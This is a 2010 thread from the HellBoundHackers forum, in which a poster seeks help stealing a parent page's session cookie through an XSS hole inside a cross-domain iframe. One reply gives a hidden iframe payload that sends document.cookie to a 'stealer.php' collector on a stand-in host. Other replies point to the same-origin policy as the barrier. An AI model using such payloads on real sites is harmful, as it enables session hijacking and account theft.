Follow us on Twitter!
Your life is ending one minute at a time. If you were to die tomorrow, what would you do today?
Saturday, April 19, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 25
Guests Online: 22
Members Online: 3

Registered Members: 82838
Newest Member: w1zarrd
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

Obtaining parent cookies from an iframe


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-04-10 03:11
I am working on some cookie stealing. I have found where to do the XSS injection, and I have got the PHP and JS written up properly. It works fine. The problem is, it is returning the cookie saved by the iframe, not the parent document. Is there even a way to access this cookie? My best find was someone using parent.document.cookie, but I couldn't get that to work. A nudge in the right direction would be extremely appreciated.

By the way, this is just some white hat for a friend. Nothing illegal.
Author

RE: Obtaining parent cookies from an iframe


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-04-10 04:17
Trying to get to the third party cookies? I think this is what you are looking for: http://the-stickman.com/web-development/iframes-third-party-cookies-and-the-documentdomain-property/. document.domain may have access for you.


Author

RE: Obtaining parent cookies from an iframe


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-04-10 04:26
Code
<iframe height='0' width='0' src="javascript:document.location='site.com/stealer.php?cookie=' + document.cookie;"></iframe>




I really doubt if anyone here cares if it's 'white' or 'black' hat...
Author

RE: Obtaining parent cookies from an iframe


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-04-10 04:51
zbert, thanks for the reply. However, that appears to only deal with cross-subdomain cookies.

xof, thank you for being entirely unhelpful. Reading is useful.

I should clarify my problem a bit further. The injection point is inside the iframe. The iframe is stored on an entirely different server. It does not even have the same domain name. When it returns the cookie and saves it, it returns the PHPSESSID that the iframe is storing. I want it to return and save the cookie of the parent document that the iframe is stored on, as that is the one with the main site's session data.


Author

RE: Obtaining parent cookies from an iframe


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-04-10 05:14
...Well now that you've finally worded your question correctly:

It's not possible to steal cookies that way unless the different servers are actually set up to interact with one another in the correct manner.

Look at this link (took me about two seconds to find by searching 'cookies from another domain' in google):
http://www.15seconds.com/issue/971108.htm
The examples are in ASP, but you should get the gist.

So what you're saying is that if I find an XSS hole in hellboundhackers.org, I can then get the cookies from paypal.com

If this was true, everyone would be screwed.

Nice try though.
Author

RE: Obtaining parent cookies from an iframe


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 14-04-10 03:03
xof wrote:
...Well now that you've finally worded your question correctly:

It's not possible to steal cookies that way unless the different servers are actually set up to interact with one another in the correct manner.

Look at this link (took me about two seconds to find by searching 'cookies from another domain' in google):
http://www.15seconds.com/issue/971108.htm
The examples are in ASP, but you should get the gist.

So what you're saying is that if I find an XSS hole in hellboundhackers.org, I can then get the cookies from paypal.com

If this was true, everyone would be screwed.

Nice try though.

The problem is, it is returning the cookie saved by the iframe, not the parent document.

Oh, because that doesn't make it clear the document.cookie DOESN'T WORK. If you are going to be an ass, at least admit you were wrong.
The pages are linked and do communicate with each other and modify each other's data. That link was surprisingly useful. I was searching more for parent to child and less about cross domain, which is why I did not find it.

Just a heads-up:
I have no problem with you being an ass. You should probably do two things, though.
1) Admit it when you messed up. You just look dumb when you try and cover it up.
2) Study a few of MoshBat's posts when he is annoying people. You will see he actually has fun. Try actually having fun while being an ass instead of just being an ass for no reason.


Author

RE: Obtaining parent cookies from an iframe

spyware
Member



Posts: 4192
Location: The Netherlands
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 14-04-10 03:45
Same Orgin Policy. The guy wasn't an ass, btw.



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert
[/s
http://bitsofspy.net
Author

RE: Obtaining parent cookies from an iframe


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 14-04-10 04:30
spyware wrote:
Same Orgin Policy. The guy wasn't an ass, btw.

Ah, thanks. That is quite helpful. Eh, I have a pretty broad definition of ass. Not reading my post and then blaming me for it makes him an ass in my book. Most people on the internet fit into my definition. Maybe I should consider changing it.




Edited by on 14-04-10 05:13